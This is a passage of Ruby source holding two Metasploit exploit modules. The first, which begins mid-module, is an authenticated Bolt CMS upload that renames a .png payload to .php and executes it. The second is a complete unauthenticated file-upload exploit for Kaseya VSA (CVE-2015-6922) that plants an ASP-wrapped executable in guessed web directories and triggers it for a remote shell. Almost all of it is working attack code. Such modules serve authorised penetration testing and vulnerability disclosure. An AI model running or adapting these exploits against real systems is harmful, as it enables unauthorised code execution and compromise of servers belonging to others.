payload, fname) res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'async', 'renamefile'), 'vars_post' => { 'namespace' => 'theme', 'parent' => fname, 'oldname' => "#{payload}.png", 'newname' => "#{payload}.php" }, 'cookie' => cookie ) return true if res && res.code == 200 && res.body.include?('1') nil end def exploit vprint_status("#{peer} - Authenticating using #{username}:#{password}") cookie = bolt_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? vprint_good("#{peer} - Authenticated with Bolt.") token = get_token(cookie, fname) fail_with(Failure::Unknown, 'No token found.') if token.nil? vprint_good("#{peer} - Token \"#{token}\" found.") vprint_status("#{peer} - Preparing payload...") payload_name = Rex::Text.rand_text_alpha_lower(10) data = Rex::MIME::Message.new data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"") data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"') post_data = data.to_s vprint_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'cookie' => cookie ) fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302 vprint_good("#{peer} - Uploaded the payload.") rename = rename_payload(cookie, payload_name, fname) fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil? php_file_name = "#{payload_name}.php" payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name) vprint_status("#{peer} - Parsed response.") register_files_for_cleanup(php_file_name) vprint_status("#{peer} - Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' ) end end
  25. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Kaseya VSA uploader.aspx Arbitrary File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary directory leading to arbitrary code execution with IUSR privileges. This module has been tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-6922'], ['ZDI', '15-449'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'], ['URL', 'http://seclists.org/bugtraq/2015/Sep/132'] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => false, 'Targets' => [ [ 'Kaseya VSA v7 to v9.1', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 23 2015')) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('ConfigTab','uploader.aspx') }) if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown end end def upload_file(payload, path, filename, session_id) print_status("#{peer} - Uploading payload to #{path}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('ConfigTab', 'uploader.aspx'), 'vars_get' => { 'PathData' => path, 'qqfile' => filename }, 'data' => payload, 'ctype' => 'application/octet-stream', 'cookie' => 'sessionId=' + session_id }) if res && res.code == 200 && res.body && res.body.to_s.include?('"success": "true"') return true else return false end end def exploit res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('ConfigTab','uploader.aspx') }) if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/ session_id = $1 else fail_with(Failure::NoAccess, "#{peer} - Failed to create a valid session") end asp_name = "#{rand_text_alpha_lower(8)}.asp" exe = generate_payload_exe payload = Msf::Util::EXE.to_exe_asp(exe).to_s paths = [ # We have to guess the path, so just try the most common directories 'C:\\Kaseya\\WebPages\\', 'C:\\Program Files\\Kaseya\\WebPages\\', 'C:\\Program Files (x86)\\Kaseya\\WebPages\\', 'D:\\Kaseya\\WebPages\\', 'D:\\Program Files\\Kaseya\\WebPages\\', 'D:\\Program Files (x86)\\Kaseya\\WebPages\\', 'E:\\Kaseya\\WebPages\\', 'E:\\Program Files\\Kaseya\\WebPages\\', 'E:\\Program Files (x86)\\Kaseya\\WebPages\\', ] paths.each do |path| if upload_file(payload, path, asp_name, session_id) register_files_for_cleanup(path + asp_name) print_status("#{peer} - Executing payload #{asp_name}") send_request_cgi({ 'uri' => normalize_uri(asp_name), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end end